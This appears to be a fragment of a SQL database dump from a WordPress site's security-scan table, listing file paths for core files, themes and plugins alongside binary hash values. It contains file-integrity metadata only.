��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('[�lw�Q��fS���','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������þ�ڱ\nN��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('r�C�N�:x����>�','wp-content/themes/anima/resources/js/ajax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���f�`�tԟ�','�d��;�V���<��ܡ��m��� }\n��\\�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�|�$7�l���ٰ�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*W��r�҃�}1���M','~Y�YG��ͫ�p���~�D��=��ƙ��z','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('���(��f�N@囬','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',0,'1\r�\Z�Y�ܵm`���','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('��/rȠߕl0~4�','wp-content/themes/promote/inc/kirki/assets/js/controls/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����.�t����j','�����C��X���c���L����h�T4jj','',0,'?'),('��\0�뀀q��v�','wp-includes/wp-includes/Requests/Exception/HTTP/306.php',0,'Wsz�uNP�j���Xu','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('�O���o�Lihn�c','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�εSs�7�hE���!','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('�)&�M2�D�\rY�U^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�����8v��w5ǿ','����Vs��y�f(����G�8�hM����\Z�j��','',0,'?'),('�jZ�����V�a','wp-includes/wp-includes/js/dist/media-utils.min.js',0,'������ϱ݂I','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_j]������RW','DŽܜ�6�\\���@���]ؿ��(��9�N c','',0,'?'),('�M���;7�;~�c���','wp-content/themes/pine/img/content/portfolio.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h:�($��.��~�ݱ�8','�vw�T����0긿�2���+�� �Nڞ�','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���p.��\'���WN','D�����%ss��&� v]3�T�sq*#��#k�','',0,'?'),('�B�)�?���f� �\'','wp-content/themes/Endolf/js/tinynav.js',0,'8�f b�Yq�\"5M�tl�','8�f b�Yq�\"5M�tl�','F\"H\r�^Ƚ\"����#{M�\\���~�[Q(�d','',0,'?'),('\r\"��<�fKl:�fdH�','wp-includes/wp-includes/class-wp.php',0,'Z�I�֩�Eu&S^:�9','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('\r!���y��?x��\'','wp-content/themes/capacious/inc/metabox/images/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�^h��E�2��w�','|�����a�ɪo�励��-�����r','',0,'?'),('\r#������D�t�q','wp-content/themes/kidzoo-lite/template-parts/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��;�%]<�,���5','Q�RE}@�\Z��O)���Bq�סm֢j��Ozj��','',0,'?'),('\r\'Y�x�iaX�+)��)','wp-content/themes/promote/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�C���U�{�','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rI���*K�����4�','wp-content/themes/Endolf/content.php',0,'i�b�j�&^�vN','i�b�j�&^�vN','@㝪���)�G����c�?��(#+\"\Z�[��-8','',0,'?'),('\rP%���z9�j�V�','wp-content/themes/storeone/inc/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�r����*]��K�=\0','��7���oY�����L�ƌ��d�ƌ�z��_','',0,'?'),('\rP�\r.B���$��Nx�H','wp-content/themes/weblog/acmethemes/hooks/comment-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��IQ��Ϭ�b�\\#','�)��`4?K8�&J�>`����r}�A(�]Cd','',0,'?'),('\rS�m��qG�x�xk�\0','wp-content/themes/capacious/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ύ<��?GOO�=2�M�','`������\\���Ѧ�����n5o���0\'','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iߞ=�%\\�����p�L4','\'й�1��]��uYїv�l�0���H�\\����','',0,'?'),('\rZ��������gG','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',0,'� �w^��]緣M','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('\rZ�Ŏ��A~','wp-content/themes/advance/parts/social-loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��f~�ˌ.����Us','�2x���(�R5���u��p�������','',0,'?'),('\r\\���q ݱҕ�|�@','wp-includes/wp-includes/SimplePie/Caption.php',0,'܊��y�u�D\r£�','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�85:��?*)K','',0,'?'),('\ro��C�bY尺7�A/','wp-content/themes/spidermag/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1����~�Ƭ�9','Bl�Hʁ[�\0�P҄Ĺd�O16j���?�','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v� h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\ryY� qi!Y�rB�h','wp-content/themes/Endolf/inc/sidebar-tab-widget.php',0,'���,_\Z�tM�ZjaW','���,_\Z�tM�ZjaW','����~R� �I_7�ջd2��$�6,�','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i� ��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M嬬�S�Ի�JP��','��H����焑;���#�O����/t��','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','` \\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�d���uQ�n�k','wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<2Q�.�%�|=�S�','$�?2���sȉ�F�G?TC?EkB��f� ��S�','',0,'?'),('\r�J/\0�9=�74�����','wp-content/themes/showcase-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�=Z��-�!?q#3�','�J墥��O������b�*�:e�š�P�','',0,'?'),('\r��#!\\H�v��-�g','wp-content/themes/promote/inc/kirki/assets/scss/sections/hover.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�ܞ\\\nowX�D2','��X��\\?!eeO���q�z��ėJD�$O0','',0,'?'),('\r�0�n$8W���4�_z','wp-includes/wp-includes/js/dist/url.min.js',0,'bͻ�:�[P�XpXα','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),('\r��:���\Z�(����','wp-content/themes/wp-barrister/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=�T��_�<��S�','���߸�/�x��j��GA\Z�\Za�0�^�t��h','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\r�pTt�\Z���n��!S�','wp-includes/wp-includes/wlwmanifest.xml',0,'�Ԑ����i�^��','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('\r�)�t�\r�{��X�-','wp-content/themes/promote/inc/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tr>f+2`bU�V8','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\rӃ��H��n�<Z�','wp-content/themes/hueman/assets/front/img/demo/8-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6^)k[�~�ʑB� �4','2�D�ޙ9���\"�d��!��]�X��c�4ͤ','',0,'?'),('\0�[|��}��袄D�','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�@K����7�','����7y�^-��\'���<^?b�L���i=x�','',0,'?'),('�{����9�I�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��ڮ9 %�{�\"�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),('�&�ho�hj�9`','wp-content/themes/advance/inc/kirki/assets/css/kirki-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('T��Ï!�H�M�3�','wp-includes/wp-includes/bookmark-template.php',0,'�dZc7��4�JX��','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('Z��w윩<�)mns','wp-includes/wp-includes/theme-compat/footer.php',0,'f�8��y̻�@�B�5','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('�݂�.7�C��O��','wp-content/themes/showcase-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��#oX�{��','ٝw�R2�����r� ��[�;�\"p���nC�','',0,'?'),('�r���W���S','wp-content/themes/promote/inc/kirki/assets/css/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[^��Q�Ǫ\r:;�5','��˝?��#�O ��C�M���\\�\n�\0VY','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('��]P�Σ�$�\Z�','wp-content/themes/skt-pathway/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yW�G�[\r�KfU�=','5�_��\'����](�A�&\Z�%�~ �[�+�','',0,'?'),('�����U��)��ʀ3G','wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u(Y�kR��S�','�%O�N+�84Nm�[�ւ���/f�wc���)\0p��','',0,'?'),('��J%�_�%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',0,'�lzV6`wmZBs���','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('����r�>D�.�h�','wp-content/themes/hueman/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��]Y4-��3G|��I','G~�G$`�&V�G�f�T����η~�3��G��','',0,'?'),('�\n\'t�+c�,�1����','wp-content/themes/newsmag/assets/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uIHh>8��R���~��','j�!��\"�A={>r�y����_��b��\0��','',0,'?'),('Ö���vh���l��P','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��ZobS\ng5����','\n�)�^�� ����`-��/��3{):?�','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B�� �O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B�^.Q�iI�','Cc�qa\0>�I�1����?^����_7�c','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�
�WB�-4Y?�{̯�','',0,'?'),('�ڝR���Q���7x�','wp-includes/wp-includes/shortcodes.php',0,'��\'9A�C��zaϥ�2','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('��?�B����;�\n�4','wp-content/themes/sg-window/css/scheme-1.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{v�.��-�&̴l','E���G�J���:�;���i��bN�_��S�F','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('�C���C*�v�\0�_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1ɪ�[�v����Y�','m5oA��K<�f�X]�zu,# ��3�s�ߵ','',0,'?'),('&@lL�G�#ck��_{','wp-content/themes/sg-window/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5��%����9ze','�E\"���Z�~6;`���+Q�z�/D��HJ`8�{','',0,'?'),('\'�E���~�(�l��','wp-includes/wp-includes/images/wlw/wp-watermark.png',0,';��uMmܭD|�w���D',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),(',o��Iw�u皍^Ķ','wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css',0,'����a�,U���ʑ�','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('7kq������g>((','wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/%�5P�,`[�@6','�WEٺǎδU���mU�V��\r��O���z��','',0,'?'),('>i��%�$�5�','wp-content/themes/promote/inc/kirki/assets/scss/controls/select.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d)b9��j��Y�oΚ','�}5�~��EPUW�m��nq�:;D�B��:K��E','',0,'?'),('EP�P�T�������','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-sanitization.php',0,'j[�n*�o�\\�','j[�n*�o�\\�','_�~QJ��vp~�zA0LW���N��·��x','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('e������~Ь9�','wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�4�a{|��r�K)l','p3\\Ll#J��Cv�\n6j�n���Նs�i�_�','',0,'?'),('qF�F=�1h�v�:�','wp-includes/wp-includes/js/jquery/ui/effect-explode.js',0,'��0���i!1�� �','��0���i!1�� �','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('wW�<��4|3%','wp-includes/wp-includes/js/jquery/jquery.serialize-object.js',0,'*�D�B\ru�6����!','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('��殇�w��m�W�o','wp-includes/wp-includes/class-wp-embed.php',0,'�1�����\\�OR���Z','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('� �8�K��Up���','wp-content/themes/spidermag/assets/library/owlcarousel/css/owl.transitions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�yF����S^','W�i1(���p�A!F\nYE�ME�Y 7OfP��','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('��%�If�Q�9�;P','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�[�G�`�9','�AT萶�G1�NbqY:֏|jt�|_�ܤx','',0,'?'),('����Q�d���ȏ��1','wp-content/themes/spidermag/assets/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EM%,� �e�d�o�e','�.�6Nk)y�*���.W�`�i3q`��̿u�<�','',0,'?'),('����t�7Y<vr=�','wp-content/themes/capacious/assets/css/animate.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŵ��C�9������^�','\0t_����.]v;�\Z�Lj�^�/�\r��v �V','',0,'?'),('��e��0��p�r���','wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js',0,'�&���\rb���!���','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː ��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7� I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('�`�斅���ϵS]','wp-content/themes/spidermag/assets/library/enquire/js/enquire.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�\Z��!���','q<-��w|�9���v\0�VǵDu�͛���','',0,'?'),('���f)�T�Q��\n','wp-content/themes/promote/inc/kirki/includes/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�Rjy�|��/c]','@��I��?\"�V���Þ�{UF�}�ɤ��','',0,'?'),('�W�y�`e�C�RB','wp-content/themes/hueman/footer.php',0,'�f�^e0v�Z^h�b','�f�^e0v�Z^h�b','�;��i.����!Y�K�4�̂t�|�>3I�','',0,'?'),('��k��p��j8̄X','wp-content/themes/cactus/assets/js/cactus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j0�H��Љy�\Z�O�п','�ߺf!�4ݥ{�)/�n��o��� ܥ��9����B','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('��r�&|�|.����','wp-content/themes/vision-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ղՁD�j���','��)���P�g�<�W��C1{B��I�P','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�\0��Y�y2>IM�3','wp-includes/wp-includes/js/wp-list-revisions.js',0,'PbOP�xO�rs7��2','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�X����{hMr�ϒ��','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js',0,'m��3���ܖ3��M','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('�?H�����h�D0 ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('�oM�p�$��%tc','wp-content/themes/anima/admin/images/logo-about-customize.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{T��( *�%�{C�~\n','n[�\Z�yr2���^�7�(\\=��ǒJ�T�#�','',0,'?'),('@,�]�6NzIg�%-','wp-includes/wp-includes/js/jcrop/Jcrop.gif',0,'Z��7e�����Q�%K','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uH�+-x���i��k�','�!}�@�,Ж@���9�ڏ+��+{�4�4@7��','',0,'?'),('����ibH���_�A','wp-includes/wp-includes/js/jquery/ui/resizable.js',0,'vk�mO,�步n3���','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('+�El>�z�#�X','wp-content/themes/advance/inc/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�������+u.','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Tz�g�\'U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��-���5��_a�_','!Pz4Y-C�i�Yk��-\0���nb:���a�[','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�\"b\"�%X=&���','�2��U+҆�5�~�=�=FL�A�ʯ�,S��','',0,'?'),('j�Mg����}{�','wp-includes/wp-includes/js/jquery/ui/droppable.min.js',0,'>���K�-�E،�N�','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('kT�fp8oo@�%\"','wp-includes/wp-includes/js/customize-base.js',0,'��Gx�Fy1w��','��Gx�Fy1w��','�s7�-<%���WȒߚC�.��. 